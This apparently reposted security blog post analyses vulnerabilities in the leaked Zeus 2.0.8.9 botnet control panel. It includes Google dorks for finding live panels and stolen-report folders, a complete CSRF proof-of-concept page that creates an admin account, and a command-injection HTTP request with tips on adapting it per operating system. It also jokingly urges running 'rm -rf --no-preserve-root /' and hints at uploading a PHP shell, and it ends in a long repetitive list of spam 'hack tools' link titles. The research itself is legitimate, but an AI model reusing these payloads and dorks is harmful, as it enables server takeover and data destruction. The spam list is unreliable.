Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:

• inurl:cp.php?m=login - this should be the login to the control panel
• inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
• inurl:install/index.php - this should be deleted, but I think this is useless now.

Boring vulns found

• Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
• No password policy - admins can set up really weak passwords
• No anti brute-force - you can try to guess the admin's password. Default username is admin
• Password autocomplete enabled - boring
• Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
• No CSRF protection - except on the password change, where the old password is needed :-( boring

Update: You can use the CSRF to create a new user with admin privileges:

<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 

• MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
• ClickJacking - really boring stuff
• Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
• SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)

The following stuff looks good, at least some vulns were taken seriously:

• The system directory is protected with .htaccess deny from all.
• gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
• Anti XSS: the following code is used almost everywhere

return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');

My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)

And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:

POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 

because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

Read more

1. Hacking Tools For Mac
2. Pentest Tools For Ubuntu
3. Hacking Tools Free Download
4. Hack Tools Download
5. Pentest Reporting Tools
6. Hacking Tools
7. Pentest Automation Tools
8. Pentest Tools Alternative
9. Hacking Tools Github
10. Hack Tools For Ubuntu
11. Tools 4 Hack
12. Hacking Tools For Windows Free Download
13. Hack Tools For Mac
14. Pentest Tools Android
15. Pentest Tools Open Source
16. Hacking Tools And Software
17. Hack Tools For Games
18. Hak5 Tools
19. Pentest Tools Nmap
20. Kik Hack Tools
21. Hacking Tools Github
22. Hacker Tools Free
23. Pentest Tools List
24. Hack Tools Download
25. Pentest Tools Online
26. Best Pentesting Tools 2018
27. Hackrf Tools
28. Pentest Recon Tools
29. Hacker Tools For Ios
30. Hack Tools Pc
31. Bluetooth Hacking Tools Kali
32. Hacking Tools 2019
33. Hacker Tools Linux
34. Hacking Tools Windows
35. Nsa Hack Tools Download
36. Hack And Tools
37. Ethical Hacker Tools
38. Nsa Hacker Tools
39. Hack Tools Pc
40. World No 1 Hacker Software
41. Hacker
42. Best Hacking Tools 2019
43. Pentest Tools Framework
44. Hacks And Tools
45. Hacker Hardware Tools
46. Hacker Tools Hardware
47. Hacking Tools For Games
48. New Hack Tools
49. Hack Rom Tools
50. Hacking App
51. Hak5 Tools
52. Pentest Tools Windows
53. Hacker Tools Windows
54. Pentest Box Tools Download
55. Growth Hacker Tools
56. Hacking Tools Usb
57. Hack Tools Download
58. Hackers Toolbox
59. Hacker Tools For Windows
60. Hacking Tools Windows
61. Free Pentest Tools For Windows
62. Pentest Tools Port Scanner
63. Hacker Tools Free
64. Physical Pentest Tools
65. Hacker Tool Kit
66. Hack Tools Download
67. Hack App
68. Hacker Tools Hardware
69. Black Hat Hacker Tools
70. Pentest Recon Tools
71. Hacking Tools Free Download
72. Hack And Tools
73. Pentest Tools Github
74. Pentest Tools Framework
75. Pentest Tools Kali Linux
76. Hacker Tools Free Download
77. Hacking Tools For Windows
78. Hacker Tools Free
79. Hacker Tools 2019
80. Hack Tools 2019
81. Hack Website Online Tool
82. Pentest Tools For Windows
83. Best Pentesting Tools 2018
84. Pentest Tools Find Subdomains
85. Hack Tools
86. Hacking App
87. Hack Rom Tools
88. Pentest Tools Framework
89. Hack Tools Pc
90. New Hacker Tools
91. Pentest Tools Open Source
92. Hacking Tools For Windows 7
93. Hacker Tools For Pc
94. Hacker Tools For Pc
95. Hacker Tools Linux
96. Hackers Toolbox
97. Hack Tool Apk No Root
98. Hacker Tools Free Download
99. Hacker Tools For Windows
100. Hacker Hardware Tools
101. Hacking Tools And Software
102. Hack App
103. Pentest Reporting Tools
104. Tools Used For Hacking
105. Hack Tools 2019
106. Hacker Tools Hardware
107. Hacker Tools Software
108. Hacker Tools Apk
109. Hacker Tools Windows
110. Usb Pentest Tools